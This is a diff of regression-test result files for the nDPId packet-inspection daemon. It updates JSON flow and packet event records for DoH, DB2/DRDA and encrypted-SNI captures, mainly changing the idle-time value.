+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739298533,"flow_last_seen":946739298798,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946739299058,"flow_last_seen":946739299326,"flow_idle_time":7560000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":3075,"flow_avg_l4_payload_len":768,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":946739348407,"flow_last_seen":946739365024,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739310588,"flow_last_seen":946739327990,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":946739304432,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":8183,"flow_avg_l4_payload_len":272,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.95.218.42","src_port":50614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739385216,"flow_last_seen":946739415379,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4699,"flow_avg_l4_payload_len":261,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739348961,"flow_last_seen":946739364914,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5460,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739305016,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5516,"flow_avg_l4_payload_len":324,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":577,"packets-processed":577,"total-skipped-flows":0,"total-l4-data-len":185420,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":34,"total-detection-updates":36,"total-updates":0,"current-active-flows":0,"total-active-flows":34,"total-idle-flows":34,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":243,"global_ts_msec":946739888204} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 577/577 diff --git a/test/results/drda_db2.pcap.out b/test/results/drda_db2.pcap.out index fb97c3694..80e2c19d1 100644 --- a/test/results/drda_db2.pcap.out +++ b/test/results/drda_db2.pcap.out 
@@ -1,11 +1,11 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"drda_db2.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1175543772220} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1175543772220,"flow_last_seen":1175543772220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1175543772220,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1175543772220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772220,"pkt":"AAwpfMZqAFBWwAABCABFAAAwIqBAAIAGglXAqGoBwKhqgBLvw1AKtGewAAAAAHAC\/\/\/kqAAAAgQFtAEBBAI="} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1175543772221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772221,"pkt":"AFBWwAABAAwpfMZqCABFAAAwAABAAEAG5PXAqGqAwKhqAcNQEu\/9XlZHCrRnsXASFtB6IQAAAgQFtAEBBAI="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1175543772221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1175543772221,"pkt":"AAwpfMZqAFBWwAABCABFAAAoIqFAAIAGglzAqGoBwKhqgBLvw1AKtGex\/V5WSFAQ\/\/+9tQAA"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1175543772220,"flow_last_seen":1175543772220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1175543772220,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1175543772220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772220,"pkt":"AAwpfMZqAFBWwAABCABFAAAwIqBAAIAGglXAqGoBwKhqgBLvw1AKtGewAAAAAHAC\/\/\/kqAAAAgQFtAEBBAI="} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1175543772221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772221,"pkt":"AFBWwAABAAwpfMZqCABFAAAwAABAAEAG5PXAqGqAwKhqAcNQEu\/9XlZHCrRnsXASFtB6IQAAAgQFtAEBBAI="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1175543772221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1175543772221,"pkt":"AAwpfMZqAFBWwAABCABFAAAoIqFAAIAGglzAqGoBwKhqgBLvw1AKtGex\/V5WSFAQ\/\/+9tQAA"} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} 
+00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-data-len":4623,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1175543810683} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 diff --git a/test/results/encrypted_sni.pcap.out b/test/results/encrypted_sni.pcap.out index e2cc5cb80..8e870eec6 100644 --- a/test/results/encrypted_sni.pcap.out +++ b/test/results/encrypted_sni.pcap.out 
@@ -1,17 +1,17 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"encrypted_sni.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1590680386576} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01422{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680386576,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGjOfAqAEMaBuBTcLeAbt3Q5LX\/48DFVAYIACwHgAAFgMBAscBAALDAwOTwM86TEdZaYZx77QiKeLaOUyI6FPS+J3L+0S3MA31OCDtrXy2AkmiC5EC8aXH8NKs5TG5ofTGvlsmIWUcTFlOhgAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg9C+VXLX0pUAYcvwRMlm2BfjMFL+A2Ha+teHeYm8XszAAFwBBBKhP+5j\/iIqKULsVEv1xkLdgIoxwczB5EVKfTq\/0aLaIOqqUx255GoGIKzaHGdYeWvgG2FTscntynOjMKiH+1xMAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAoJey8d6KdccaSJO2lCYt20kw0EEYFyldVNE\/b+wVlLQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJJYkyzxOIwgn94z1v2QNIt6jP8xZjqajLZOZBVhvvpl7nmhmH4lW1IkwcuGd4kzR+4ip9x\/EzAG6tckU\/flqZH1nG16JhZuu6rEiIYaISW303wwyjD1flAsQnOsqJ0PVy+NZQoiiKbjH4viDA+P+GiaonlAB8r2TaJD+948G4F7MBjpovbjBjfrBFM8f7NuL4fwv7ssjFdJ5mNaCsSn9Hj6115hdy9xFKhCCzMA44L9pVw\/vrGvG+5UfibZ5LK2nZAPALOtdzhzm7d0W1ff7a4XSuSSFRI3gCI5CHoPx4osmf747Wa4ElvuEUhPCcdTFrF6efl9qMHJEUwf8zrcwZxBFmZHEDMTcH8MlFUx5dN14A3E5eAVFahmuI+6IR1wd8HaXtmYAHAACQAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680386576,"flow_last_seen":1590680386576,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680386576,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.27.129.77","src_port":49886,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680387847,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGkJDAqAEMaBB9r8LfAbu98X4VZuCG7lAYIACqfgAAFgMBAscBAALDAwPZvt6xqK7JiSO2eRBioUk2Uu867QdPWpn6Sv4hYS472iAz8c+AKNafKEsBeorsjdYMXk2HdHvKJL23Af8gga\/qxAAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAg0HCVKAanlLS9J1B8hdchDfkoKDxcPc3B5hBZYsZWdz8AFwBBBCakAur\/e3rF+tGl0au7NOTY4DQpBg\/YjV6ew74w8otvaCGiCdoeWGhEGjsldqwZrBxN3o59i8BSdRX+YPQ+GgkAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACAFyK2kXV21yqtAW2T62b\/NDTnJgxOrhECle3qcjynhZQAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJLkAAE456EuY9a6HsKAg7En+2G8rSItqsoven5V2IfJ3
Q2bekOZcTKgIZokRYkaF7ExtxsFhqXy+gigbwIQnaXqjvmpA5fAKz4tj4ykxew5OhWQtUKuHkOYZfaYtn1syOdzFlDd5f+dopSDJ1HH+q6E3XfYeSjmwk2PLEJ57JKeThEiW3dFrbufb5XbXZxYdeC179v7EU6Bakj2Njpvv\/Jfo5WxPGqtw\/pm8l4GeHZCKXzswlPS\/Jet6JKlP28PhB6QjuLs0HyKQD3u9h3gOMLbs85P+uPv\/61THn6BnP+Gq0XsiHUv\/ZFCqDNSvUTBmtmCAtgIUfzrLcUWkNsVonaILrLi\/m6vYUQElVuyPe7nXS\/qvJdz0NipXdWB8POXCwp8YOWkAHAACQAE="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680387847,"flow_last_seen":1590680387847,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680387847,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.16.125.175","src_port":49887,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"957015a0b1e2500d8777219893a09495","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":770,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":770,"pkt_l4_len":736,"thread_ts_msec":1590680391590,"pkt":"EBMx8Tl2KDc3AG3ICABFAAL0AABAAEAGxnTAqAEMaBZHxcLpAbsLJg40SW6gUlAYIAANXgAAFgMBAscBAALDAwMJLl9l\/OldUJYbpqd0xOpts3Kv4zg2hroTXcdX9KeB2CBjkfBVUTqX532YPuVZHQd0J5lIK2OZH9nsSRBnWwKDWwAkEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAMwA5AC8ANQAKAQACVgAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAMwBrAGkAHQAgsbxhJX9IcnjB7rdgEb2YIBohnnxEhKIToNk1er8CIioAFwBBBLtlLNXLCuP0okhISXwuyj6tgeyLGZ5yaSZ9uT3zAbum2y5l1gYjS6RGBBL9dNcuY2pA4Ze582sOuuo0cAvw2TsAKwAJCAMEAwMDAgMBAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAf\/OAW4TAQAdACCgcq\/jSZGFwhXJHl9nfU84W9RHblecX+XHXi+knd++egAgHyQSymUyoBaYNvGbjOJlOzPcW4r7yiRdTxErCb+vUsgBJM1prHJ\/+qDqcKEqpG5xU365kjS5loGMkTxyoKwRhL+l3TthfgE+TKCSsunPt4vNjTPLrxKpdN+3jkm4v5pXmXQY7xTIeDCWHjyEgNKkvyfWHZEc70MAkkqfNhBXSLrthF\/1heQEBlRbs1xtqteJZDPsTf1rb0lyjahdcH23rHhPVaZljcat4wh7Hka7vt+kTz6HVLMaa8+FGdKR02KYBfqCbkN5nqbjMCHPCoPKBXF7APN9aYQZNPW1vyVMZGeIilksOKMAfbO31cu423QrZX+PlzwFC6qBeqVxOTzYpLwLIxJGCnfdBRD0u85D1TvPM05OjHVwJVu9F3FEA\/S2klQ0zWf5b6ngXXAHdoEO61eGscgYik1z+CCLYUuTKEqAk5KVlL4AHAACQAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"encrypted_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1590680391590,"flow_last_seen":1590680391590,"flow_idle_time":7440000,"flow_min_l4_payload_len":716,"flow_max_l4_payload_len":716,"flow_tot_l4_payload_len":716,"flow_avg_l4_payload_len":716,"midstream":1,"thread_ts_msec":1590680391590,"l3_proto":"ip4","src_ip":"192.168.1.12","dst_ip":"104.22.71.197","src_port":49897,"dst_port":443,"l4_proto":"tcp","ndpi": 
